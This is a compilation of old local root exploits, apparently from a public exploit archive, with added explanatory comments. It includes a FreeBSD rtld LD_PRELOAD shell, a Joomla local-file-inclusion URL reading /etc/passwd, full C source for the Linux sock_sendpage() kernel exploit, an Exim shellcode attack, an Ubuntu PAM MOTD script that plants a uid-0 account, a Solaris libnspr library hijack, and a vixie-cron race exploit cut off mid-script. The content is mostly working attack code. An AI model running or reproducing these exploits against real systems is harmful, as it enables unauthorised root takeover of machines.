# program.c: the preloaded library. Built with -nostartfiles so that the
# _init() defined here is the initialiser run when the object is loaded; it
# clears environ and starts a shell from inside the setuid process.
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
# Must match the LD_PRELOAD path hard-coded in env.c. A shared object under
# /tmp named by LD_PRELOAD for a setuid program is the thing to look for.
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
FreeBSD local root exploit that leverages a bug in the Run-Time Link-Editor (rtld). Versions 7.1 and 8.0 are vulnerable.
AntiSecurity/Joomla Multiple Root Local File Inclusion ( na)
===============================================================================================================
[o] Joomla Component Multiple Root Local File Inclusion Vulnerability
Software : com_multiroot version 1.0
Vendor : http://joomlacomponent.inetlanka.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
===============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_multiroot&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
===============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
===============================================================================================================
[o] April 18 2010 - GMT +07:00 Jakarta, Indonesia
The Joomla Multiple Root component version 1.0 suffers from a local file inclusion vulnerability.
Ramon de Carvalho Valle/Linux sock_sendpage() Local Root Exploit ( na)
/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
/* x86_64: read %rsp directly. Provided for symmetry with the 32-bit and
 * PowerPC variants; on this architecture current_task_struct() below does
 * not use it (it reads %gs instead). */
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(void)
{
/* 32-bit x86: read %esp. current_task_struct() masks this value to locate
 * thread_info / task_struct, so it is only meaningful when this code is
 * executing on a kernel stack (see change_cred() and main()). */
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
/* PowerPC (32- and 64-bit): r1 is the stack pointer. Consumed by the
 * PowerPC current_task_struct() below. */
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
/* x86_64: the code assumes the first word of the per-CPU area addressed
 * through %gs is the current task pointer - presumably the per-CPU data
 * layout of the kernels listed in the file header; the layout is
 * kernel-specific, so confirm against the target. No validation is done,
 * and the read is only meaningful in kernel mode (change_cred()). */
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
/*
 * 32-bit x86: derive the current task_struct from the (kernel) stack
 * pointer. Two layouts are tried in order:
 *  - 2.6: the code treats the 4 KiB-aligned stack base as thread_info and
 *    its first word as the task_struct pointer; the pointer is accepted
 *    only if it is a kernel address (>= 0xc0000000) and the task_struct's
 *    first word is the TASK_RUNNING state.
 *  - 2.4: the 8 KiB-aligned stack base is either the task_struct itself
 *    or points to it.
 * Returns (unsigned long)-1 when no candidate passes. Every dereference is
 * an unchecked kernel-memory read, so a wrong guess faults rather than
 * failing gracefully. Only meaningful when running in kernel mode via
 * change_cred() (see main()).
 */
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
 * The TASK_RUNNING is the only possible state for a process executing
 * in user-space.
 */
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
 * Prior to the 2.6 kernel series, the task_struct was stored at the end
 * of the kernel stack.
 */
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
/*
 * PowerPC: mask the stack pointer down to the kernel stack base (16 KiB on
 * ppc64, 8 KiB on ppc32) and accept it as the task_struct if its first word
 * is TASK_RUNNING; otherwise treat it as thread_info and follow its first
 * word, applying the same check. Returns (unsigned long)-1 when neither
 * matches. Unchecked kernel-memory reads throughout, as in the x86 variant.
 */
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(void)
{
/*
 * Kernel-mode payload for x86. main() plants a stub at address 0 that
 * transfers control here, so this runs when the kernel calls through the
 * NULL function pointer described in the file header. Starting at the
 * task_struct it walks forward one 32-bit word at a time looking for the
 * pattern uid,uid,uid,uid,gid,gid,gid,gid (presumably the uid/euid/suid/
 * fsuid and gid/egid/sgid/fsgid fields of the task_struct, as recorded by
 * main() in the statics above) and zeroes all eight, i.e. makes the
 * process root.
 *
 * NOTE(review): the walk is unbounded - with no match it keeps reading
 * until it faults. current_task_struct() reports failure as -1, which is
 * non-NULL and so does not stop the loop either. Always returns -1; the
 * value is not used.
 */
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(void)
{
/*
 * Kernel-mode payload for PowerPC; reached the same way as the x86 version
 * (see main()). Unlike the x86 variant it does not know the caller's
 * uid/gid: it scans forward from the task_struct for the first non-zero
 * word that is repeated four times and followed by another word repeated
 * four times, and zeroes all eight. Same caveats as the x86 variant: the
 * scan is unbounded, -1 from current_task_struct() does not stop it, and
 * the return value (-1) is unused.
 */
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(void)
{
/*
 * Entry point. Sequence: (1) map the page at address 0, (2) write a stub
 * there that transfers control to change_cred(), (3) reach the kernel
 * NULL-function-pointer call named in the file header through sendfile()
 * on a Bluetooth datagram socket, (4) exec a shell with whatever
 * credentials change_cred() left behind.
 *
 * Step (1) is the mitigation point: on a kernel that enforces a non-zero
 * mmap_min_addr the MAP_FIXED mapping at NULL is refused and the program
 * exits via perror(); the header describes the SELinux policy interaction
 * that defeated that on the listed RHEL/CentOS releases. Patched kernels
 * (marked "not vulnerable" in the header) remove the dereference itself.
 */
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
/* Recorded for change_cred()'s signature search of the task_struct. */
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/* Appears to encode an absolute indirect jump through the pointer stored
 * at offset 8 of this page (SIB form, since a plain disp32 would be
 * RIP-relative on x86_64); that pointer is set to change_cred below. The
 * 8-byte write at offset 3 is partly overwritten by the pointer write. */
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
/* 32-bit equivalent: indirect jump through the pointer at offset 8. */
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
 * The use of function descriptors by the Power 64-bit ELF ABI requires
 * the use of a fake function descriptor.
 */
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
/* ppc32: a short stub that appears to load change_cred's address into a
 * register (upper half, then lower half) and branch to it via the count
 * register. */
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
/* The socket type whose sendpage operation is unset in the affected
 * kernels (per the header); sendfile() below drives the call. */
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
/* One-page anonymous temp file to serve as sendfile()'s input. The name
 * is unlinked immediately so nothing is left on disk. */
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
/* Return value deliberately ignored: the call is expected to fail from the
 * caller's point of view; the side effect in change_cred() is what matters.
 * Neither descriptor is closed before the exec. */
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Linux 2.4 and 2.6 kernel sock_sendpage() local root exploit for powerpc.
darkeagle/Exim <= 4.42 Local Root Exploit ( linux)
#!/bin/sh
# Local Lame R00T sploit for exim <= 4.42
# by Dark Eagle
#
# My First Coding Release In bash ))
# Unl0ck Research Team
#
# More Effective than C-code.
#
# @env.c content:
#
###################################################
# #include <stdio.h>
# #include <string.h>
# int main(int argc, char *argv[])
# {
# char *addr_ptr;
# addr_ptr = getenv(argv[1]);
# printf("%s @ %p\n", argv[1], addr_ptr);
# return 0;
# }
###################################################
# Build the helper described above (prints where a named variable sits in a
# fresh process's environment) and drop it into /usr/bin. Both steps are
# unchecked: the cp normally fails for an unprivileged user, after which the
# later "@env CODE" only resolves if the current directory is on PATH.
gcc @env.c -o @env
cp @env /usr/bin
# Unchecked cd: everything after this assumes ./exim resolves here.
cd /usr/exim/bin
# NOTE(review): as reproduced on this page the perl string is split across
# two lines, so the embedded newline would become part of CODE; this may be a
# line-wrap artefact of the listing rather than the original script.
CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE
@env CODE
echo "So, dude, starting..."
echo "NoW Just Type Address Of CODE"
# The value printed by @env is typed back in by hand; nothing validates it.
read ADDRESS
echo "You are typed: $ADDRESS"
echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"
# Runs exim's host-testing mode (-bh) with an over-long address argument;
# $ADDRESS is interpolated by the shell (the quoting around it ends and
# restarts the perl string). Releases after 4.42 are the remedy per the header.
./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`
# milw0rm.com [2005-02-07]
anonymous/Ubuntu PAM MOTD Local Root Exploit ( linux)
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped /home/user/.cache
# [*] spawn ssh
# [+] owned: /etc/passwd
# [*] spawn ssh
# [+] owned: /etc/shadow
# [*] Restored /home/user/.cache
# [*] Restored /home/user/.ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# root@ubuntu:/home/user# id
# uid=0(root) gid=0(root) groupes=0(root)
#
# passwd and shadow entries for the temporary uid-0 user "toor" named in the
# header; they are appended once each file has been made writable (see below)
# and deleted again by the cleanup command at the end of the script.
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
# Prerequisites: a local ssh client and keygen, and an sshd running as root
# (the login to localhost in own() is what drives the PAM MOTD module).
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
  # Move $1 aside as $1.bak, discarding any stale backup first.
  # Returns 0 when there is nothing to back up, 1 when the move fails.
  local target="$1"
  if [ ! -e "$target" ]; then
    return 0
  fi
  if [ -e "$target.bak" ]; then
    rm -rf "$target.bak"
  fi
  if ! mv "$target" "$target.bak"; then
    return 1
  fi
  echo "[*] Backuped $target"
}
restore() {
  # Put $1.bak back in place as $1, removing whatever currently sits at $1.
  # Returns 0 when there is no backup to restore, 1 when the move fails.
  local target="$1"
  if [ -e "$target" ]; then
    rm -rf "$target"
  fi
  if [ ! -e "$target.bak" ]; then
    return 0
  fi
  if ! mv "$target.bak" "$target"; then
    return 1
  fi
  echo "[*] Restored $target"
}
key_create() {
# Generate a throwaway RSA key at $KEY (assigned by the caller before this
# runs) and install its public half as the sole ~/.ssh/authorized_keys,
# backing up any existing file first. The login this enables is to the
# user's own account on localhost. Returns 1 on any failed step.
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "[*] SSH key set up"
}
key_remove() {
# Undo key_create(): delete the private key and put the original
# authorized_keys back (restore() is a no-op if there was none).
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "[*] SSH key removed"
}
own() {
# Replace ~/.cache with a symlink to $1 and log in to localhost with the
# temporary key. Presumably the PAM MOTD module named in the header acts on
# ~/.cache during that login - the script relies on it, and afterwards
# expects $1 to have become writable by this user. The ssh call itself is
# unchecked; only the -w test decides. On failure ~/.cache is restored and
# bye() tears the key down and exits.
# Detection: ~/.cache turned into a symlink to a system file, plus an ssh
# login from localhost with a freshly created key.
[ -e ~/.cache ] && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "[*] spawn ssh"
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
echo "[+] owned: $1"
}
bye() {
# Error exit: undo the SSH key changes and leave with status 1. Does not
# touch ~/.cache; own() restores that itself before calling here.
key_remove
exit 1
}
# Path for the temporary key. mktemp -u only reserves a name, so there is a
# small window before ssh-keygen creates the file.
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
# ~/.cache is moved aside so own() can replace it with a symlink.
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
# Append the toor entries once each file has been made writable.
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
# Switch to toor and clean up at once: delete the toor lines, reset the
# ownership and group of both files (apparently left user-owned by the step
# above), refresh nscd, then drop into a shell. The remedy for admins is the
# "Patch Instructions" line in the header; a passwd/shadow file not owned by
# root, or a uid-0 account other than root, is the artefact to look for.
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
Marco Ivaldi/Solaris 10 libnspr constructor Local Root Exploit ( solaris)
#!/bin/sh
#
# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $
#
# raptor_libnspr3 - Solaris 10 libnspr constructor exploit
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Local exploitation of a design error vulnerability in version 4.6.1 of
# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to
# create or overwrite arbitrary files on the system. The problem exists
# because environment variables are used to create log files. Even when the
# program is setuid, users can specify a log file that will be created with
# elevated privileges (CVE-2006-4842).
#
# Yet another newschool version of the local root exploit: this time we place
# our code in the global constructor (ctors) for the library, as suggested by
# gera. This way, we don't have to hide a real function and we have a generic
# library that can be used in all exploits like this. To avoid annoying side-
# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing
# a library in the default search path.
#
# See also:
# http://www.0xdeadbeef.info/exploits/raptor_libnspr
# http://www.0xdeadbeef.info/exploits/raptor_libnspr2
#
# Usage:
# $ chmod +x raptor_libnspr3
# $ ./raptor_libnspr3
# [...]
# Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# # id
# uid=0(root) gid=1(other)
# # rm /usr/lib/secure/libldap.so.5
# #
#
# Vulnerable platforms (SPARC):
# Solaris 10 without patch 119213-10 [tested]
#
# Vulnerable platforms (x86):
# Solaris 10 without patch 119214-10 [untested]
#
echo "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
# prepare the environment
# Per the header (CVE-2006-4842), NSPR honours NSPR_LOG_FILE even in a setuid
# program, so the log file below is created with root's privileges at a path
# under a directory the loader trusts. The patches named in the header are
# the remedy; a world-writable file appearing under /usr/lib/secure is the
# artefact to look for.
NSPR_LOG_MODULES=all:5
NSPR_LOG_FILE=/usr/lib/secure/libldap.so.5
export NSPR_LOG_MODULES NSPR_LOG_FILE
# gimme -rw-rw-rw-!
# umask 0 makes the root-created log file writable by this user, so it can be
# overwritten with the library built below.
umask 0
# setuid program linked to /usr/lib/mps/libnspr4.so
/usr/bin/chkey
# other good setuid targets
#/usr/bin/passwd
#/usr/bin/lp
#/usr/bin/cancel
#/usr/bin/lpset
#/usr/bin/lpstat
#/usr/lib/lp/bin/netpr
#/usr/sbin/lpmove
#/usr/bin/su
#/usr/bin/mailq
# prepare the evil shared library
# The library has no exported functions of its own: its only code is a
# constructor that runs when the object is loaded. No headers are included,
# so gcc will warn about implicit declarations; the $? check below only
# catches hard errors.
echo "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c
echo " setuid(0);" >> /tmp/ctors.c
echo " execle(\"/bin/ksh\", \"ksh\", 0, 0);" >> /tmp/ctors.c
echo "}" >> /tmp/ctors.c
gcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc
if [ $? -ne 0 ]; then
echo "problems compiling evil shared library, check your gcc"
exit 1
fi
# newschool LD_LIBRARY_PATH foo;)
# The log variables are cleared so su itself does not create another file;
# the header's "trusted directories" remark is why the loader accepts this
# LD_LIBRARY_PATH entry for a setuid program. The usage section above shows
# the cleanup step (removing the planted library) that must follow.
unset NSPR_LOG_MODULES NSPR_LOG_FILE
LD_LIBRARY_PATH=/usr/lib/secure su -
# milw0rm.com [2006-10-24]
Michal Zalewski/vixie-cron Local Root Exploit ( linux)
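#!/bin/bash
# bash rather than /bin/sh: the script uses $[...] arithmetic, "echo -ne",
# "&>" redirection and "usleep", none of which a plain POSIX sh guarantees.
echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... <marchew@dione.ids.pl> |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo
echo ' * another vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> * '
echo
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might |'
echo '| require some tuning, to be slower, but resources-effective. It expects |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |'
echo '| sooner or later, and spoofs the legitimate cron entry file with evil |'
echo '| content, thus leading to account compromise (usually: root compromise). |'
echo "\`-------------------------------------------------------------------------'"
echo
# How many throw-away "crontab" runs to use for pre-creating tmp.<pid> nodes
# in /var/spool/cron.  The success estimate below divides by 32768, presumably
# the pid space of the kernels this was written for.
CYCLES=32768
# The account whose "crontab -e" / "crontab <file>" we lie in wait for.
DESTUSER=root
# Make sure this really is vixie cron: everything below depends on its
# tmp.<pid> spool file naming.
VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`"
if [ "$VCRON" = "" ]; then
	echo "[-] Sorry, this box is not running vixie cron."
	echo
	exit 1
else
	echo "[+] Found Paul Vixie's /usr/bin/crontab utility."
fi
# The spool must be readable so we can see (and later reuse) the tmp nodes.
if [ -r /var/spool/cron ]; then
	echo "[+] This box has exploitable /var/spool/cron..."
else
	echo "[-] Sorry, this box is not vulnerable to this attack."
	echo
	exit 1
fi
# ... and crontab must be setuid, or it could not create files there at all.
if [ -u /usr/bin/crontab ]; then
	echo "[+] This box has setuid crontab utility..."
else
	echo "[-] Sorry, this box has no setuid crontab."
	echo
	exit 1
fi
# Helper #1: run with stdout already open on the victim's tmp.<pid> node, it
# rewinds the node and replaces whatever the victim wrote with a crontab line
# that runs /tmp/.rootcron every minute.  26 bytes are written and the file is
# truncated to 25 so exactly one trailing newline is left.  The include and a
# proper main() are required: implicit declarations are a hard error on
# current compilers.
cat >dowrite.c <<'_EOF_'
#include <unistd.h>
int main(void) {
	lseek(1, 0, SEEK_SET);
	write(1, "* * * * * /tmp/.rootcron\n\n", 26);
	ftruncate(1, 25);
	return 0;
}
_EOF_
echo "[+] Compiling helper application #1..."
gcc -o dowrite dowrite.c
if [ ! -f dowrite ]; then
	echo "[-] Compilation failed."
	echo
	exit 1
fi
echo "[+] Application #1 compiled successfully."
echo "[+] Creating helper application #2..."
# Helper #2: executed by cron as $DESTUSER once the spoofed entry is active.
# It turns helper #3 into a root-owned setuid/setgid binary, removes the junk
# nodes and the planted crontab, and stays quiet.  It is a #!/bin/sh script,
# so the redirection is written in POSIX form rather than bash's "&>".
cat >/tmp/.rootcron <<'_EOF_'
#!/bin/sh
(
chown root.root /tmp/.r00tcr0n
chmod 6755 /tmp/.r00tcr0n
rm -f /var/spool/cron/tmp.*
crontab -r
) >/dev/null 2>&1
_EOF_
# Helper #3: the setuid root shell that helper #2 creates.  Unlinks itself
# before exec'ing so nothing is left behind in /tmp.
cat >root.c <<'_EOF_'
#include <stdio.h>
#include <unistd.h>
int main(void) {
	setuid(0); setgid(0);
	unlink("/tmp/.r00tcr0n");
	execl("/bin/bash", "bash", "-i", (char *)0);
	perror("bash");
	return 1;
}
_EOF_
echo "[+] Compiling helper application #3..."
gcc -o /tmp/.r00tcr0n root.c
if [ ! -f /tmp/.r00tcr0n ]; then
	echo "[-] Compilation failed."
	echo
	exit 1
fi
echo "[+] Application #3 compiled successfully."
X=0
if [ ! "$1" = "noprep" ]; then
	echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..."
	echo " Please be patient, setup might took some time; to skip it if"
	echo " /var/spool/cron on this machine is already initialized, use"
	echo " '$0 noprep'."
	PROB=$[CYCLES*100/32768]
	test "$PROB" -gt "100" && PROB=100
	echo "[+] This gives almost $PROB% probability of success on the first attempt."
	# Each cycle starts crontab (which creates a tmp.<pid> node in the spool;
	# the umask 0 is presumably what leaves it writable to us) and kills it a
	# moment later so the node stays behind.  One node per pid value we hit.
	while [ "$X" -lt "$CYCLES" ]; do
		X=$[X+1]
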